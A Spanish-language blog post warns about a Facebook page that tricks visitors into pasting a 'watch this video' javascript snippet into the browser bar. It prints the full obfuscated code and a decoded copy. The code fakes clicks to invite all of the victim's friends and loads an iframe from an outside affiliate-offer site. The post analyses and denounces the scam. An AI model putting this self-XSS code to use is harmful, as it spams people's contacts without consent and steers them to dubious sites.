En

Me llegó un correo electrónico de uno de mis amigos invitándome a una de esas páginas de facebook… por lo general, borro sin ingresar a las páginas, pero como estaba aburrido y me llamó la atención, entre a ver (de curioso nomás).

La página es: http://www.facebook.com/pages/WARNING-PLEASE-ONLY-WATCH-THIS-VIDEO-UNDER-SUPERVISION/126155444067400?v=app_111766512170470

Según explican, después de ver el video te “dormís por 5 segundos” … altísimo verso.
Me llamó la atención los treinta mil fans que tiene la página… 30 mil !
Así que me puse a investigarlo… y twitteé el tema para ver si alguien sabía de esto; y que no me esté metiendo de cabeza en la boca del lobo al pedo…

Para ingresar al video, tenes que seguir tres pasos:

  1. Hacerte fan de la página
  2. Ingresar un código en la barra de navegación de tu explorador de internet
  3. Ver el video

Sí, leíste bien… el 2do paso es ingresar un código en la barra de navegación; este es el código:

javascript:var _0x89f8=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x31\x31\x31\x37\x36\x36\x35\x31\x32\x31\x37\x30\x34\x37\x30\x5F\x64\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3c\x61\x20\x69\x64\x3d\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3d\x22\x23\x22\x20\x61\x6a\x61\x78\x69\x66\x79\x3d\x22\x2f\x61\x6a\x61\x78\x2f\x73\x6f\x63\x69\x61\x6c\x5f\x67\x72\x61\x70\x68\x2f\x69\x6e\x76\x69\x74\x65\x5f\x64\x69\x61\x6c\x6f\x67\x2e\x70\x68\x70\x3f\x63\x6c\x61\x73\x73\x3d\x46\x61\x6e\x4d\x61\x6e\x61\x67\x65\x72\x26\x61\x6d\x70\x3b\x6e\x6f\x64\x65\x5f\x69\x64\x3d\x31\x32\x36\x31\x35\x35\x34\x34\x34\x30\x36\x37\x34\x30\x30\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x20\x70\x72\x6f\x66\x69\x6c\x65\x5f\x61\x63\x74\x69\x6f\x6e\x20\x61\x63\x74\x69\x6f\x6e\x73\x70\x72\x6f\x5f\x61\x22\x20\x72\x65\x6c\x3d\x22\x64\x69\x61\x6c\x6f\x67\x2d\x70\x6f\x73\x74\x22\x3e\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6f\x20\x46\x72\x69\x65\x6e\x64\x73\x3c\x2f\x61\x3e","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"]; void (document[_0x89f8[2]](_0x89f8[1])[_0x89f8[0]]=_0x89f8[3]);var ss=document[_0x89f8[2]](_0x89f8[4]);var c=document[_0x89f8[6]](_0x89f8[5]);c[_0x89f8[8]](_0x89f8[7],true,true); void (ss[_0x89f8[9]](c)); void (setTimeout(function (){fs[_0x89f8[10]]();} ,4000)); void (setTimeout(function (){SocialGraphManager[_0x89f8[13]](_0x89f8[11],_0x89f8[12]);} ,5000));
void (document[_0x89f8[2]](_0x89f8[1])[_0x89f8[0]]= '\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x68\x69\x64\x65\x72\x65\x66\x65\x72\x2e\x63\x6f\x6d\x2f\x39\x35\x35\x39\x34\x46\x55\x44\x2e\x68\x74\x6d\x22\x20\x73\x74\x79\x6c\x65\x3d\x22\x77\x69\x64\x74\x68\x3a\x20\x37\x36\x30\x70\x78\x3b\x20\x68\x65\x69\x67\x68\x74\x3a\x20\x34\x35\x35\x70\x78\x3b\x22\x20\x66\x72\x61\x6d\x65\x62\x6f\x72\x64\x65\x72\x3d\x30\x20\x73\x63\x72\x6f\x6c\x6c\x69\x6e\x67\x3d\x22\x6e\x6f\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');

Como podrán observar, no se entiende nada de lo que estamos pegando en el explorador de internet, pero por lo que vi a mucha gente eso no le importa… salvo a mí que me puse a googlear el tema, sin éxito… hasta que llegué a un código parecido gracias a los foros de Digital Point.
Es un peligro que la gente haga lo que la página dice, por ver un video que ni ellos saben de que se trata… totalmente engañados copian ese código y lo ejecutan… totalmente convencidos de que por arte de magia van a ser direccionados al video; y lamentablemente no parece haber video… triste… muy triste.

Lo que hace el código:

Si bien aun estoy esperando que la gente de Digital Point me decodifique, en un principio lo que hace es muy similar a esto:

void(document['getElementById']('app4949752878_dd')['innerHTML'] = '<a id="suggest" href="#" ajaxify="/ajax/social_graph/invite_dialog.php?class=FanManager&node_id=109839669048307" class=" profile_action actionspro_a" rel="dialog-post">Suggest to Friends</a>');
var ss = document['getElementById']('suggest');
var c = document['createEvent']('MouseEvents');
c['initEvent']('click', true, true);
void(ss['dispatchEvent'](c));
void(setTimeout(function () {
    fs['select_all']();
}, 4000));
void(setTimeout(function () {
    SocialGraphManager['submitDialog']('sgm_invite_form', '/ajax/social_graph/invite_dialog.php');
}, 5000));

void(document['getElementById']('app4949752878_dd')['innerHTML'] = '<iframe src="http://booksee.net/96sleep/cpa.php" style="width: 700px; height: 450px;" frameborder=0 scrolling="no"></iframe>');

Entonces, invita a muchos amigos a visitar la página… y después te muestra falsamente ésta imagen:

Que linkea a un sitio bajo ésta URL http://bit.ly/dsmU8W; la cual a la vez redirecciona a ésta URL: http://fbjmp.info/?MCDOffer (la cual está Off-line)

Estimo que la URL a la que re direccionaba era ésta: _ttp://booksee.net/96sleep/cpa.php (no recomiendo ingresar a dicha URL bajo ningún concepto)

Es interesante el tema en Digital Point, como discuten sobre si es (o puede ser) peligroso éste tipo de códigos que se están regando por las páginas de Facebook (y otras redes sociales), y el usuario “Dimitar Christoff” aclara:

“(…) there is nothing to worry about, its not a virus or malware or anything at all like that. all it does is help pages go viral - basically, the premise is, entice the user to paste it whilst they are on the page. doing so creates a link to the contacts list (send to friends) in the page body. using event delegation through the link's class name, it then simulates a click (which opens the contacts list), it waits a bit, selects all of them and clicks send. worst case scenario, you spam your contacts with a recommendation for becoming fans on some silly page.”

Básicamente aclara que no es un virus o malware ni nada por el estilo. Funciona únicamente si el usuario pega el código estando “dentro” del sitio de la pagina (en mi caso Facebook), crea un link para mandarle una recomendación a nuestros amigos, simula un clic que abre nuestros contactos, espera un rato, selecciona a “todos” y clickea en “enviar”. El peor escenario es que nosotros somos spammers, pues le recomendamos a todos nuestros amigos que vengan a ver esta estúpida página.

Una inteligente, pero lamentable forma de traer gente hacia la página… aunque, aun no le encuentro el sentido. Por cierto, la denuncié… =)

Saludos, Waldd0.

Etiquetas de Technorati: ,